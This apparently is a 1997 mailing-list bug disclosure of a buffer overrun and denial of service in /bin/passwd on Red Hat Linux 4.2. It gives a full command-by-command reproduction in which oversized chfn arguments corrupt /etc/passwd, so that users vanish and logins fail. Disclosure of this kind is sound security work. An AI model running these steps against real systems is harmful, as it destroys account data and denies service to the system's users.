Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)

Alex Mottram (alex@NET-CONNECT.NET)
Fri, 19 Dec 1997 07:37:49 -0600

I don't have the time to look into this much further, but it definitely
looks scarey. I've tried it on 3 machines, and they all produce the
same results. For what it's worth, all 3 machines were installed from
the Redhat PowerTools 4.2 CD and have applied all relevant patches
from ftp.redhat.com/pub/updates/4.2/i386/.

Configuration Information
---------------------------------------------
[alex@machine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)

rpm -qf /usr/bin/chfn
util-linux-2.5-38

rpm -qf /usr/bin/passwd
passwd-0.50-7

rpm -q pam
pam-0.57-4

[alex@machine alex]$ cat /etc/pam.conf
#
# THIS FILE IS NOW OBSOLETE
#
# The contents of this file should be replaced by files in the
# /etc/pam.d/ directory.
#
#

[alex@machine alex]$ ls /etc/pam.d/
chfn ftp login passwd rlogin samba xdm
chsh imap other rexec rsh su

[alex@machine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so shadow nullok
use_authtok
session required /lib/security/pam_pwdb.so

[alex@machine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so use_authtok nullok

[alex@machine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash

[alex@machine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as
well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash

[alex@machine /tmp]$ ./pass
[alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.
[alex@machine /tmp]$ wc /etc/passwd
26 29 2068 /etc/passwd

** At this point, the passwd entry for 'alex' is >48k long **

[alex@machine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault

** LOGIN AS SECOND USER **
[zane@machine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

** 'passwd' just snipped our one big line into nice 8k chunks
** and created some junk passwd file entries.

[zane@machine zane]$ wc /etc/passwd
31 34 47829 /etc/passwd

[zane@machine zane]$ su someuser
su: user someuser does not exist
[zane@machine zane]$ su alex
su: user alex does not exist
[zane@machine zane]$ su zane
su: user zane does not exist

Other services I checked were equally screwed. (ftp, pop-3, etc...)